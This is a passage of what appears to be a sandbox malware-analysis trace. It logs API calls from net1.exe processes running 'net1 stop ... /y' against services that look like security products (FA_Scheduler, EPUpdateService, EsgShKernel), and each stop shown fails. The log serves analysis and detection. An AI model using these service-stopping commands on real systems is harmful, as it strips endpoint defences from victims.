_String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="start", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="stats", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="statistics", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="stop", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="time", _String2="FA_Scheduler") returned 14 [0097.492] _wcsicmp (_String1="user", _String2="FA_Scheduler") returned 15 [0097.492] _wcsicmp (_String1="users", _String2="FA_Scheduler") returned 15 [0097.492] _wcsicmp (_String1="msg", _String2="FA_Scheduler") returned 7 [0097.492] _wcsicmp (_String1="messenger", _String2="FA_Scheduler") returned 7 [0097.492] _wcsicmp (_String1="receiver", _String2="FA_Scheduler") returned 12 [0097.492] _wcsicmp (_String1="rcv", _String2="FA_Scheduler") returned 12 [0097.492] _wcsicmp (_String1="netpopup", _String2="FA_Scheduler") returned 8 [0097.492] _wcsicmp (_String1="redirector", _String2="FA_Scheduler") returned 12 [0097.492] _wcsicmp (_String1="redir", _String2="FA_Scheduler") returned 12 [0097.492] _wcsicmp (_String1="rdr", _String2="FA_Scheduler") returned 12 [0097.492] _wcsicmp (_String1="workstation", _String2="FA_Scheduler") returned 17 [0097.492] _wcsicmp (_String1="work", _String2="FA_Scheduler") returned 17 [0097.492] _wcsicmp (_String1="wksta", _String2="FA_Scheduler") returned 17 [0097.492] _wcsicmp (_String1="prdr", _String2="FA_Scheduler") returned 10 [0097.492] _wcsicmp (_String1="devrdr", _String2="FA_Scheduler") returned -2 [0097.492] _wcsicmp (_String1="lanmanworkstation", _String2="FA_Scheduler") returned 6 [0097.492] _wcsicmp (_String1="server", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="svr", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="srv", _String2="FA_Scheduler") returned 13 [0097.492] _wcsicmp (_String1="lanmanserver", _String2="FA_Scheduler") returned 6 [0097.492] _wcsicmp (_String1="alerter", _String2="FA_Scheduler") returned -5 [0097.492] _wcsicmp (_String1="netlogon", _String2="FA_Scheduler") returned 8 [0097.492] _wcsupr (in: _String="FA_Scheduler" | out: _String="FA_SCHEDULER") returned="FA_SCHEDULER" [0097.493] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x23ce10 [0097.497] GetServiceKeyNameW (in: hSCManager=0x23ce10, lpDisplayName="FA_SCHEDULER", lpServiceName=0xffd35750, lpcchBuffer=0x1efd48 | out: lpServiceName="", lpcchBuffer=0x1efd48) returned 0 [0097.498] _wcsicmp (_String1="msg", _String2="FA_SCHEDULER") returned 7 [0097.498] _wcsicmp (_String1="messenger", _String2="FA_SCHEDULER") returned 7 [0097.498] _wcsicmp (_String1="receiver", _String2="FA_SCHEDULER") returned 12 [0097.498] _wcsicmp (_String1="rcv", _String2="FA_SCHEDULER") returned 12 [0097.498] _wcsicmp (_String1="redirector", _String2="FA_SCHEDULER") returned 12 [0097.498] _wcsicmp (_String1="redir", _String2="FA_SCHEDULER") returned 12 [0097.498] _wcsicmp (_String1="rdr", _String2="FA_SCHEDULER") returned 12 [0097.498] _wcsicmp (_String1="workstation", _String2="FA_SCHEDULER") returned 17 [0097.498] _wcsicmp (_String1="work", _String2="FA_SCHEDULER") returned 17 [0097.498] _wcsicmp (_String1="wksta", _String2="FA_SCHEDULER") returned 17 [0097.498] _wcsicmp (_String1="prdr", _String2="FA_SCHEDULER") returned 10 [0097.498] _wcsicmp (_String1="devrdr", _String2="FA_SCHEDULER") returned -2 [0097.498] _wcsicmp (_String1="lanmanworkstation", _String2="FA_SCHEDULER") returned 6 [0097.498] _wcsicmp (_String1="server", _String2="FA_SCHEDULER") returned 13 [0097.498] _wcsicmp (_String1="svr", _String2="FA_SCHEDULER") returned 13 [0097.498] _wcsicmp (_String1="srv", _String2="FA_SCHEDULER") returned 13 [0097.498] _wcsicmp (_String1="lanmanserver", _String2="FA_SCHEDULER") returned 6 [0097.498] _wcsicmp (_String1="alerter", _String2="FA_SCHEDULER") returned -5 [0097.498] _wcsicmp (_String1="netlogon", _String2="FA_SCHEDULER") returned 8 [0097.498] NetServiceControl (in: servername=0x0, service="FA_SCHEDULER", opcode=0x0, arg=0x0, bufptr=0x1efd50 | out: bufptr=0x1efd50) returned 0x889 [0097.499] wcscpy_s (in: _Destination=0xffd380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0097.499] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0097.500] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffd35b50, nSize=0x800, Arguments=0xffd37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0097.502] GetFileType (hFile=0xb) returned 0x2 [0097.502] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1efc18 | out: lpMode=0x1efc18) returned 1 [0097.502] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1efc10, lpReserved=0x0 | out: lpBuffer=0xffd35b50*, lpNumberOfCharsWritten=0x1efc10*=0x1e) returned 1 [0097.502] GetFileType (hFile=0xb) returned 0x2 [0097.503] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1efc18 | out: lpMode=0x1efc18) returned 1 [0097.503] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efc10, lpReserved=0x0 | out: lpBuffer=0xffd11efc*, lpNumberOfCharsWritten=0x1efc10*=0x2) returned 1 [0097.503] _ultow (in: _Dest=0x889, _Radix=2030720 | out: _Dest=0x889) returned="2185" [0097.503] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffd35b50, nSize=0x800, Arguments=0xffd37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0097.503] GetFileType (hFile=0xb) returned 0x2 [0097.504] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1efc18 | out: lpMode=0x1efc18) returned 1 [0097.504] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1efc10, lpReserved=0x0 | out: lpBuffer=0xffd35b50*, lpNumberOfCharsWritten=0x1efc10*=0x34) returned 1 [0097.504] GetFileType (hFile=0xb) returned 0x2 [0097.504] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1efc18 | out: lpMode=0x1efc18) returned 1 [0097.505] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efc10, lpReserved=0x0 | out: lpBuffer=0xffd11efc*, lpNumberOfCharsWritten=0x1efc10*=0x2) returned 1 [0097.505] NetApiBufferFree (Buffer=0x234d50) returned 0x0 [0097.505] NetApiBufferFree (Buffer=0x23c100) returned 0x0 [0097.505] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop FA_Scheduler /y" [0097.505] exit (_Code=2) Process: id = "120" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5fba7000" os_pid = "0xee8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "110" os_parent_pid = "0x126c" cmd_line = "C:\\Windows\\system32\\net1 stop EPUpdateService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5707 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5708 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5709 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5710 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 5711 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5712 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5713 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5714 start_va = 0xffd10000 end_va = 0xffd42fff entry_point = 0xffd10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5715 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5716 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5717 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 5718 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5719 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 5720 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5721 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5722 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5723 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5724 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5725 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5726 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 5727 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5728 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5729 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5730 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5731 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5732 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5733 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5734 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5735 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5736 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5737 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5738 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5739 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5740 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5741 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5742 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5743 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5744 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5800 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 529 os_tid = 0xcf4 [0097.358] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fe30 | out: lpSystemTimeAsFileTime=0x14fe30*(dwLowDateTime=0xef3207f0, dwHighDateTime=0x1d48689)) [0097.358] GetCurrentProcessId () returned 0xee8 [0097.358] GetCurrentThreadId () returned 0xcf4 [0097.358] GetTickCount () returned 0x2222f [0097.358] QueryPerformanceCounter (in: lpPerformanceCount=0x14fe38 | out: lpPerformanceCount=0x14fe38*=1814427600000) returned 1 [0097.360] GetModuleHandleW (lpModuleName=0x0) returned 0xffd10000 [0097.360] __set_app_type (_Type=0x1) [0097.360] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffd29c9c) returned 0x0 [0097.360] __getmainargs (in: _Argc=0xffd34780, _Argv=0xffd34790, _Env=0xffd34788, _DoWildCard=0, _StartInfo=0xffd3479c | out: _Argc=0xffd34780, _Argv=0xffd34790, _Env=0xffd34788) returned 0 [0097.360] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0097.360] GetConsoleOutputCP () returned 0x1b5 [0097.510] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffd3cec0 | out: lpCPInfo=0xffd3cec0) returned 1 [0097.510] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0097.512] sprintf_s (in: _DstBuf=0x14fdd8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0097.512] setlocale (category=0, locale=".437") returned="English_United States.437" [0097.514] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0097.514] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0097.514] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPUpdateService /y" [0097.514] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14fb70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0097.514] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0097.514] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fdc8 | out: Buffer=0x14fdc8*=0x2f4d50) returned 0x0 [0097.514] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fdc8 | out: Buffer=0x14fdc8*=0x2fc100) returned 0x0 [0097.514] _fileno (_File=0x7fefdba2a80) returned 0 [0097.514] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0097.515] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0097.515] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0097.515] _wcsicmp (_String1="config", _String2="stop") returned -16 [0097.515] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0097.515] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0097.515] _wcsicmp (_String1="file", _String2="stop") returned -13 [0097.515] _wcsicmp (_String1="files", _String2="stop") returned -13 [0097.515] _wcsicmp (_String1="group", _String2="stop") returned -12 [0097.515] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0097.515] _wcsicmp (_String1="help", _String2="stop") returned -11 [0097.515] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0097.515] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0097.515] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0097.515] _wcsicmp (_String1="session", _String2="stop") returned -15 [0097.515] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0097.515] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0097.515] _wcsicmp (_String1="share", _String2="stop") returned -12 [0097.515] _wcsicmp (_String1="start", _String2="stop") returned -14 [0097.515] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0097.515] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0097.515] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0097.515] _wcsicmp (_String1="accounts", _String2="EPUpdateService") returned -4 [0097.515] _wcsicmp (_String1="computer", _String2="EPUpdateService") returned -2 [0097.515] _wcsicmp (_String1="config", _String2="EPUpdateService") returned -2 [0097.515] _wcsicmp (_String1="continue", _String2="EPUpdateService") returned -2 [0097.515] _wcsicmp (_String1="cont", _String2="EPUpdateService") returned -2 [0097.515] _wcsicmp (_String1="file", _String2="EPUpdateService") returned 1 [0097.515] _wcsicmp (_String1="files", _String2="EPUpdateService") returned 1 [0097.515] _wcsicmp (_String1="group", _String2="EPUpdateService") returned 2 [0097.516] _wcsicmp (_String1="groups", _String2="EPUpdateService") returned 2 [0097.516] _wcsicmp (_String1="help", _String2="EPUpdateService") returned 3 [0097.516] _wcsicmp (_String1="helpmsg", _String2="EPUpdateService") returned 3 [0097.516] _wcsicmp (_String1="localgroup", _String2="EPUpdateService") returned 7 [0097.516] _wcsicmp (_String1="pause", _String2="EPUpdateService") returned 11 [0097.516] _wcsicmp (_String1="session", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="sessions", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="sess", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="share", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="start", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="stats", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="statistics", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="stop", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="time", _String2="EPUpdateService") returned 15 [0097.516] _wcsicmp (_String1="user", _String2="EPUpdateService") returned 16 [0097.516] _wcsicmp (_String1="users", _String2="EPUpdateService") returned 16 [0097.516] _wcsicmp (_String1="msg", _String2="EPUpdateService") returned 8 [0097.516] _wcsicmp (_String1="messenger", _String2="EPUpdateService") returned 8 [0097.516] _wcsicmp (_String1="receiver", _String2="EPUpdateService") returned 13 [0097.516] _wcsicmp (_String1="rcv", _String2="EPUpdateService") returned 13 [0097.516] _wcsicmp (_String1="netpopup", _String2="EPUpdateService") returned 9 [0097.516] _wcsicmp (_String1="redirector", _String2="EPUpdateService") returned 13 [0097.516] _wcsicmp (_String1="redir", _String2="EPUpdateService") returned 13 [0097.516] _wcsicmp (_String1="rdr", _String2="EPUpdateService") returned 13 [0097.516] _wcsicmp (_String1="workstation", _String2="EPUpdateService") returned 18 [0097.516] _wcsicmp (_String1="work", _String2="EPUpdateService") returned 18 [0097.516] _wcsicmp (_String1="wksta", _String2="EPUpdateService") returned 18 [0097.516] _wcsicmp (_String1="prdr", _String2="EPUpdateService") returned 11 [0097.516] _wcsicmp (_String1="devrdr", _String2="EPUpdateService") returned -1 [0097.516] _wcsicmp (_String1="lanmanworkstation", _String2="EPUpdateService") returned 7 [0097.516] _wcsicmp (_String1="server", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="svr", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="srv", _String2="EPUpdateService") returned 14 [0097.516] _wcsicmp (_String1="lanmanserver", _String2="EPUpdateService") returned 7 [0097.517] _wcsicmp (_String1="alerter", _String2="EPUpdateService") returned -4 [0097.517] _wcsicmp (_String1="netlogon", _String2="EPUpdateService") returned 9 [0097.517] _wcsupr (in: _String="EPUpdateService" | out: _String="EPUPDATESERVICE") returned="EPUPDATESERVICE" [0097.517] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2fce10 [0097.521] GetServiceKeyNameW (in: hSCManager=0x2fce10, lpDisplayName="EPUPDATESERVICE", lpServiceName=0xffd35750, lpcchBuffer=0x14fce8 | out: lpServiceName="", lpcchBuffer=0x14fce8) returned 0 [0097.522] _wcsicmp (_String1="msg", _String2="EPUPDATESERVICE") returned 8 [0097.522] _wcsicmp (_String1="messenger", _String2="EPUPDATESERVICE") returned 8 [0097.522] _wcsicmp (_String1="receiver", _String2="EPUPDATESERVICE") returned 13 [0097.522] _wcsicmp (_String1="rcv", _String2="EPUPDATESERVICE") returned 13 [0097.522] _wcsicmp (_String1="redirector", _String2="EPUPDATESERVICE") returned 13 [0097.522] _wcsicmp (_String1="redir", _String2="EPUPDATESERVICE") returned 13 [0097.522] _wcsicmp (_String1="rdr", _String2="EPUPDATESERVICE") returned 13 [0097.522] _wcsicmp (_String1="workstation", _String2="EPUPDATESERVICE") returned 18 [0097.522] _wcsicmp (_String1="work", _String2="EPUPDATESERVICE") returned 18 [0097.522] _wcsicmp (_String1="wksta", _String2="EPUPDATESERVICE") returned 18 [0097.522] _wcsicmp (_String1="prdr", _String2="EPUPDATESERVICE") returned 11 [0097.522] _wcsicmp (_String1="devrdr", _String2="EPUPDATESERVICE") returned -1 [0097.522] _wcsicmp (_String1="lanmanworkstation", _String2="EPUPDATESERVICE") returned 7 [0097.522] _wcsicmp (_String1="server", _String2="EPUPDATESERVICE") returned 14 [0097.522] _wcsicmp (_String1="svr", _String2="EPUPDATESERVICE") returned 14 [0097.522] _wcsicmp (_String1="srv", _String2="EPUPDATESERVICE") returned 14 [0097.522] _wcsicmp (_String1="lanmanserver", _String2="EPUPDATESERVICE") returned 7 [0097.522] _wcsicmp (_String1="alerter", _String2="EPUPDATESERVICE") returned -4 [0097.522] _wcsicmp (_String1="netlogon", _String2="EPUPDATESERVICE") returned 9 [0097.522] NetServiceControl (in: servername=0x0, service="EPUPDATESERVICE", opcode=0x0, arg=0x0, bufptr=0x14fcf0 | out: bufptr=0x14fcf0) returned 0x889 [0097.523] wcscpy_s (in: _Destination=0xffd380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0097.523] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0097.524] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffd35b50, nSize=0x800, Arguments=0xffd37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0097.525] GetFileType (hFile=0xb) returned 0x2 [0097.526] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14fbb8 | out: lpMode=0x14fbb8) returned 1 [0097.526] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14fbb0, lpReserved=0x0 | out: lpBuffer=0xffd35b50*, lpNumberOfCharsWritten=0x14fbb0*=0x1e) returned 1 [0097.526] GetFileType (hFile=0xb) returned 0x2 [0097.527] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14fbb8 | out: lpMode=0x14fbb8) returned 1 [0097.527] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14fbb0, lpReserved=0x0 | out: lpBuffer=0xffd11efc*, lpNumberOfCharsWritten=0x14fbb0*=0x2) returned 1 [0097.527] _ultow (in: _Dest=0x889, _Radix=1375264 | out: _Dest=0x889) returned="2185" [0097.527] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffd35b50, nSize=0x800, Arguments=0xffd37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0097.527] GetFileType (hFile=0xb) returned 0x2 [0097.528] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14fbb8 | out: lpMode=0x14fbb8) returned 1 [0097.528] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14fbb0, lpReserved=0x0 | out: lpBuffer=0xffd35b50*, lpNumberOfCharsWritten=0x14fbb0*=0x34) returned 1 [0097.528] GetFileType (hFile=0xb) returned 0x2 [0097.528] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14fbb8 | out: lpMode=0x14fbb8) returned 1 [0097.529] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14fbb0, lpReserved=0x0 | out: lpBuffer=0xffd11efc*, lpNumberOfCharsWritten=0x14fbb0*=0x2) returned 1 [0097.529] NetApiBufferFree (Buffer=0x2f4d50) returned 0x0 [0097.529] NetApiBufferFree (Buffer=0x2fc100) returned 0x0 [0097.529] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPUpdateService /y" [0097.529] exit (_Code=2) Process: id = "121" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x61c05000" os_pid = "0xff4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "114" os_parent_pid = "0x12b0" cmd_line = "C:\\Windows\\system32\\net1 stop EsgShKernel /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5745 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5746 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 